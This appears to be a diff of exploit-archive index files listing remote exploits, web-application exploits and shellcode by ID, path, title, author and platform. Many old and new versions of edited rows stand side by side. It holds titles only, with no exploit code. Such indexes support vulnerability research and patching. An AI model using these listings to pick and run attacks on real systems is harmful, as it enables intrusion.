27806,exploits/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",remote,windows,
27606,exploits/windows/remote/27606.rb,"Intrasrv 1.0 - Remote Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80
27607,exploits/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,remote,windows,8000
27608,exploits/windows/remote/27608.rb,"Ultra Mini HTTPD - Remote Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80
27608,exploits/windows/remote/27608.rb,"Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80
27610,exploits/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,remote,php,80
27611,exploits/windows/remote/27611.txt,"Oracle Java - 'IntegerInterleavedRaster.verify()' Signed Integer Overflow",2013-08-15,"Packet Storm",remote,windows,
27627,exploits/windows/remote/27627.txt,"Saxopress - 'URL' Directory Traversal",2006-04-11,SecuriTeam,remote,windows,
@ -14278,7 +14280,7 @@ id,file,description,date,author,type,platform,port
28501,exploits/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,remote,multiple,
28508,exploits/hardware/remote/28508.rb,"Raidsonic NAS Devices - Unauthenticated Remote Command Execution (Metasploit)",2013-09-24,Metasploit,remote,hardware,
28512,exploits/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",remote,windows,
28595,exploits/linux/remote/28595.txt,"BusyBox 1.01 - HTTPD Directory Traversal",2006-09-16,bug-finder,remote,linux,
28595,exploits/linux/remote/28595.txt,"BusyBox 1.01 - HTTPd Directory Traversal",2006-09-16,bug-finder,remote,linux,
28602,exploits/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",remote,multiple,
28639,exploits/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution",2006-09-21,LMH,remote,linux,
28640,exploits/windows/remote/28640.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure",2006-09-21,"Patrick Webster",remote,windows,
@ -14660,7 +14662,7 @@ id,file,description,date,author,type,platform,port
31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",remote,windows,
31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,
31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix,
31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80
31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80
31737,exploits/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,remote,windows,
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
31757,exploits/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
@ -14671,7 +14673,7 @@ id,file,description,date,author,type,platform,port
31770,exploits/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",remote,multiple,
31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution",2014-02-20,"Julien Ahrens",remote,windows,
31789,exploits/windows/remote/31789.py,"PCMan FTP Server 2.07 - Remote Buffer Overflow",2014-02-20,Sumit,remote,windows,21
31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)",2014-02-22,"OJ Reeves",remote,windows,80
31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)",2014-02-22,"OJ Reeves",remote,windows,80
31820,exploits/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",remote,unix,
31828,exploits/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",remote,hardware,
31831,exploits/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",remote,windows,30000
@ -15836,9 +15838,10 @@ id,file,description,date,author,type,platform,port
43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,
43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091
43693,exploits/hardware/remote/43693.txt,"Master IP CAM 01 - Multiple Vulnerabilities",2018-01-17,"Raffaele Sabato",remote,hardware,
43881,exploits/hardware/remote/43881.txt,"AsusWRT Router < 3.0.0.4.380.7743 - Unauthenticated LAN Remote Code Execution",2018-01-22,"Pedro Ribeiro",remote,hardware,
43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware,
43876,exploits/php/remote/43876.rb,"Kaltura - Remote PHP Code Execution over Cookie (Metasploit)",2018-01-24,Metasploit,remote,php,
43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,
43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,
40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple,
40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,
40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471
@ -15929,7 +15932,7 @@ id,file,description,date,author,type,platform,port
41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,
43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
43360,exploits/linux/remote/43360.py,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
43374,exploits/php/remote/43374.rb,"Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)",2017-12-19,Metasploit,remote,php,443
43375,exploits/multiple/remote/43375.rb,"Jenkins - XStream Groovy classpath Deserialization (Metasploit)",2017-12-19,Metasploit,remote,multiple,8080
43376,exploits/android/remote/43376.rb,"Samsung Internet Browser - SOP Bypass (Metasploit)",2017-12-20,"Dhiraj Mishra",remote,android,
@ -15981,7 +15984,7 @@ id,file,description,date,author,type,platform,port
41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows,
42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android,
41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,
41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,Metasploit,remote,hardware,80
41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,
41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",remote,windows,
41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",remote,multiple,
@ -23446,7 +23449,7 @@ id,file,description,date,author,type,platform,port
12510,exploits/php/webapps/12510.php,"PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution",2010-05-05,"Michael Brooks",webapps,php,
12514,exploits/php/webapps/12514.txt,"PHP-Nuke 5.0 - Viewslink SQL Injection",2010-05-05,CMD,webapps,php,
12515,exploits/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution",2010-05-05,"Sn!pEr.S!Te Hacker",webapps,php,
12517,exploits/php/webapps/12517.txt,"Getsimple 2.01 - Local File Inclusion",2010-05-06,Batch,webapps,php,
12517,exploits/php/webapps/12517.txt,"Getsimple CMS 2.01 - Local File Inclusion",2010-05-06,Batch,webapps,php,
12519,exploits/php/webapps/12519.txt,"AV Arcade - 'Search' Cross-Site Scripting / HTML Injection",2010-05-06,"Vadim Toptunov",webapps,php,
12520,exploits/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - 'LOGIN' Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",webapps,php,
12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,webapps,php,
@ -28289,7 +28292,7 @@ id,file,description,date,author,type,platform,port
26295,exploits/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,webapps,php,
26296,exploits/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,webapps,php,
26009,exploits/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",webapps,php,
26012,exploits/windows/webapps/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,webapps,windows,80
26012,exploits/windows/webapps/26012.rb,"Novell ZENworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,webapps,windows,80
26014,exploits/php/webapps/26014.txt,"FForm Sender 1.0 - 'Processform.php3?Name' Cross-Site Scripting",2005-07-19,rgod,webapps,php,
26015,exploits/php/webapps/26015.txt,"Form Sender 1.0 - 'Processform.php3?Failed' Cross-Site Scripting",2005-07-19,rgod,webapps,php,
26016,exploits/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,webapps,php,
@ -31033,7 +31036,7 @@ id,file,description,date,author,type,platform,port
30191,exploits/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - 'Autoscroll' Cross-Site Scripting",2007-06-14,"Rajat Swarup",webapps,jsp,
29672,exploits/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",webapps,php,80
29673,exploits/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit)",2013-11-18,"Jake Reynolds",webapps,hardware,37777
29674,exploits/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,jsp,
29674,exploits/jsp/webapps/29674.txt,"ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,jsp,
29675,exploits/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,asp,
29789,exploits/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,webapps,php,
29694,exploits/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 - 'index.php' SQL Injection",2007-03-01,Samenspender,webapps,php,
@ -33866,8 +33869,8 @@ id,file,description,date,author,type,platform,port
34511,exploits/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download",2014-09-01,"Hugo Santiago",webapps,php,80
34513,exploits/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",webapps,multiple,
34514,exploits/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",webapps,php,80
34518,exploits/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp,
34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400
34518,exploits/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp,
34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400
34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80
34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",webapps,multiple,
34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",webapps,php,
@ -34635,7 +34638,7 @@ id,file,description,date,author,type,platform,port
35722,exploits/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",webapps,php,80
35723,exploits/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections",2011-05-01,"AutoSec Tools",webapps,php,
35724,exploits/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,webapps,php,
35726,exploits/php/webapps/35726.py,"Getsimple 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php,
35726,exploits/php/webapps/35726.py,"Getsimple CMS 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php,
35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,webapps,php,
35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",webapps,asp,
35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
@ -35252,7 +35255,7 @@ id,file,description,date,author,type,platform,port
36675,exploits/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injections",2015-04-08,LiquidWorm,webapps,php,80
36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80
36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80
36678,exploits/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp,
36678,exploits/jsp/webapps/36678.txt,"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp,
36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java,
36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php,
@ -35820,7 +35823,7 @@ id,file,description,date,author,type,platform,port
37524,exploits/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,webapps,hardware,80
37527,exploits/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W - OS Command Injection",2015-07-08,"Core Security",webapps,hardware,
37528,exploits/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",webapps,php,80
37621,exploits/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",webapps,windows,
37621,exploits/windows/webapps/37621.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",webapps,windows,
37530,exploits/php/webapps/37530.txt,"WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",webapps,php,80
37531,exploits/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",webapps,hardware,
37532,exploits/hardware/webapps/37532.txt,"AirLive (Multiple Products) - OS Command Injection",2015-07-08,"Core Security",webapps,hardware,8080
@ -35859,7 +35862,7 @@ id,file,description,date,author,type,platform,port
37584,exploits/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple SQL Injections",2012-08-07,"Chris Cooper",webapps,php,
37585,exploits/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php?subject_module_id' SQL Injection",2012-08-07,"Chris Cooper",webapps,php,
37586,exploits/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,webapps,php,
37587,exploits/php/webapps/37587.txt,"Getsimple - 'path' Local File Inclusion",2012-08-07,PuN!Sh3r,webapps,php,
37587,exploits/php/webapps/37587.txt,"Getsimple CMS 3.1.2 - 'path' Local File Inclusion",2012-08-07,PuN!Sh3r,webapps,php,
37588,exploits/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,webapps,php,80
37589,exploits/java/webapps/37589.txt,"ConcourseSuite - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",webapps,java,
37590,exploits/php/webapps/37590.txt,"phpList 2.10.18 - 'unconfirmed' Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",webapps,php,
@ -36482,7 +36485,7 @@ id,file,description,date,author,type,platform,port
38816,exploits/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",webapps,jsp,
38819,exploits/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",webapps,php,
38820,exploits/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,webapps,php,
38822,exploits/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,webapps,windows,8080
38822,exploits/windows/webapps/38822.rb,"SysAid Help Desk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,webapps,windows,8080
38831,exploits/php/webapps/38831.txt,"HumHub 0.11.2/0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",webapps,php,80
38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",webapps,php,
38830,exploits/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",webapps,php,80
@ -36731,7 +36734,7 @@ id,file,description,date,author,type,platform,port
39282,exploits/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - '/wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",webapps,php,
39283,exploits/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,webapps,php,
39287,exploits/php/webapps/39287.txt,"WordPress Plugin WP Content Source Control - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",webapps,php,
39288,exploits/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",webapps,multiple,
39288,exploits/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro / ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",webapps,multiple,
39289,exploits/php/webapps/39289.txt,"ArticleFR - 'id' SQL Injection",2014-08-20,"High-Tech Bridge",webapps,php,
39290,exploits/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,webapps,php,
39291,exploits/php/webapps/39291.txt,"WordPress Plugin KenBurner Slider - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,webapps,php,
@ -37268,6 +37271,17 @@ id,file,description,date,author,type,platform,port
43869,exploits/php/webapps/43869.txt,"Flexible Poll 1.2 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43870,exploits/php/webapps/43870.txt,"Professional Local Directory Script 1.0 - SQL Injection",2018-01-24,"Ihsan Sencan",webapps,php,
43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php,
43883,exploits/windows/webapps/43883.txt,"BMC Track-It! 11.4 - Multiple Vulnerabilities",2015-09-28,"Pedro Ribeiro",webapps,windows,
43884,exploits/hardware/webapps/43884.txt,"Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities",2017-01-31,"Pedro Ribeiro",webapps,hardware,
43885,exploits/hardware/webapps/43885.txt,"SysAid Help Desk 14.4 - Multiple Vulnerabilities",2015-06-10,"Pedro Ribeiro",webapps,hardware,
43886,exploits/hardware/webapps/43886.txt,"Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities",2014-10-12,"Pedro Ribeiro",webapps,hardware,
43888,exploits/php/webapps/43888.txt,"GetSimple CMS 3.3.1 - Cross-Site Scripting",2014-10-12,"Pedro Ribeiro",webapps,php,
43889,exploits/php/webapps/43889.txt,"CMS Made Simple 1.11.9 - Multiple Vulnerabilities",2014-10-12,"Pedro Ribeiro",webapps,php,
43892,exploits/multiple/webapps/43892.txt,"ManageEngine Desktop Central - Create Administrator",2015-01-15,"Pedro Ribeiro",webapps,multiple,
43893,exploits/multiple/webapps/43893.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)",2014-11-05,"Pedro Ribeiro",webapps,multiple,
43894,exploits/multiple/webapps/43894.txt,"ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities",2015-02-09,"Pedro Ribeiro",webapps,multiple,
43895,exploits/multiple/webapps/43895.txt,"ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download",2014-12-03,"Pedro Ribeiro",webapps,multiple,
43896,exploits/multiple/webapps/43896.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-09,"Pedro Ribeiro",webapps,multiple,
40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
@ -37373,6 +37387,7 @@ id,file,description,date,author,type,platform,port
40940,exploits/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)",2016-12-16,"Lenon Leite",webapps,php,
40941,exploits/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",webapps,php,
40942,exploits/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",webapps,multiple,
43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - Authenticated Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp,
40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple,
40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php,
40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,

Can't render this file because it is too large.

347
files_shellcodes.csv
View file

@ -1,5 +1,5 @@
id,file,description,date,author,type,platform
14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
@ -36,8 +36,8 @@ id,file,description,date,author,type,platform
13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13281,shellcodes/generator/13281.c,"Linux/x86 - execve() + Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
@ -51,8 +51,8 @@ id,file,description,date,author,type,platform
13292,shellcodes/hardware/13292.asm,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
13293,shellcodes/hardware/13293.asm,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13295,shellcodes/hp-ux/13295.c,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
